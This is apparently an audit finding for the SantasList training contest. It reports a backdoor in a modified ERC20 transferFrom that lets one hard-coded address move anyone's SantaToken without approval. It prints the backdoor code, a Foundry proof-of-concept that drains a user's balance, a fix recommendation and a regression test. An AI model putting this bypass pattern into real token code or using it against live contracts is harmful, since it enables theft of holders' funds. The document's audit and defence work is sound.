Severity: high
Valid

Backdoor in transferFrom of the ERC20 implementation

Summary

The transferFrom function in the ERC20 implementation contains a backdoor that allows a specific address to transfer any SantaToken to another specific address. This backdoor can be exploited by the address 0x815F577F1c1bcE213c012f166744937C889DAF17 to transfer SantaToken from any account to its own address.

Vulnerability Details

The vulnerable code can be found in the transferFrom function of the ERC20 implementation. The code checks if the msg.sender is equal to 0x815F577F1c1bcE213c012f166744937C889DAF17, and if true, it subtracts the specified amount from the from address and adds it to the to address.

Backdoor

function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
    // hehehe :)
    // https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d
    if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
        // hard-coded caller: no allowance check, moves `amount` out of any `from`
        balanceOf[from] -= amount;
        unchecked {
            balanceOf[to] += amount;
        }
        emit Transfer(from, to, amount);
        return true;
    }
    ...

Foundry PoC

function testBackdoorERC20() public {
    // SantasList is the only authorised minter; mint 1e18 to `user`
    vm.prank(address(santasList));
    santaToken.mint(user);
    assertEq(santaToken.balanceOf(user), 1e18);

    // the backdoor address pulls the full balance with no approval
    address pirateBackdoor = 0x815F577F1c1bcE213c012f166744937C889DAF17;
    vm.prank(pirateBackdoor);
    santaToken.transferFrom(user, pirateBackdoor, 1e18);
    assertEq(santaToken.balanceOf(user), 0);
    assertEq(santaToken.balanceOf(pirateBackdoor), 1e18);
}

Impact

This vulnerability allows the address 0x815F577F1c1bcE213c012f166744937C889DAF17 to transfer any amount of SantaToken from any account to its own address. This can lead to unauthorized transfers and potential loss of all funds for any users owning SantaTokens.

Tools Used

Manual review

Recommendations

To fix this vulnerability, the backdoor code should be removed from the transferFrom function. Additionally, it is recommended to only use trusted libraries for implementing ERC20 tokens to avoid potential security issues.
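A regression test for the fix, added here and not part of the original submission or the project: it assumes the backdoor branch has been removed so that transferFrom is back to the upstream solmate allowance check, and it assumes the PoC's fixture (a test contract named SantasListTest exposing santaToken, santasList and user, and SantaToken.mint(address) minting 1e18) can be inherited.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Assumed: the test contract that holds the PoC fixture (santaToken, santasList, user).
import {SantasListTest} from "./SantasListTest.t.sol";

// With the hard-coded branch gone, the former backdoor address is an ordinary
// spender with zero allowance: its pull must revert, while an approved spender
// must still be able to move exactly the approved amount.
contract TransferFromFixTest is SantasListTest {
    address constant FORMER_BACKDOOR = 0x815F577F1c1bcE213c012f166744937C889DAF17;

    function _mintToUser() internal {
        vm.prank(address(santasList));
        santaToken.mint(user);                     // mints 1e18, as in the PoC
        assertEq(santaToken.balanceOf(user), 1e18);
    }

    function testFormerBackdoorCannotPullWithoutAllowance() public {
        _mintToUser();
        assertEq(santaToken.allowance(user, FORMER_BACKDOOR), 0);

        vm.prank(FORMER_BACKDOOR);
        // `allowed - amount` underflows; checked arithmetic (>=0.8) reverts with a panic
        vm.expectRevert();
        santaToken.transferFrom(user, FORMER_BACKDOOR, 1e18);

        // balances untouched
        assertEq(santaToken.balanceOf(user), 1e18);
        assertEq(santaToken.balanceOf(FORMER_BACKDOOR), 0);
    }

    function testApprovedSpenderStillWorks() public {
        _mintToUser();
        address spender = makeAddr("spender");

        vm.prank(user);
        santaToken.approve(spender, 1e18);

        vm.prank(spender);
        santaToken.transferFrom(user, spender, 1e18);

        assertEq(santaToken.balanceOf(user), 0);
        assertEq(santaToken.balanceOf(spender), 1e18);
        assertEq(santaToken.allowance(user, spender), 0); // limited allowance is consumed
    }
}
```

Running this against the unpatched library makes the first test fail, which is the signal to keep in CI so a re-introduced hard-coded sender cannot slip past review again.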

Updates

Lead Judging Commences

inallhonesty Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88
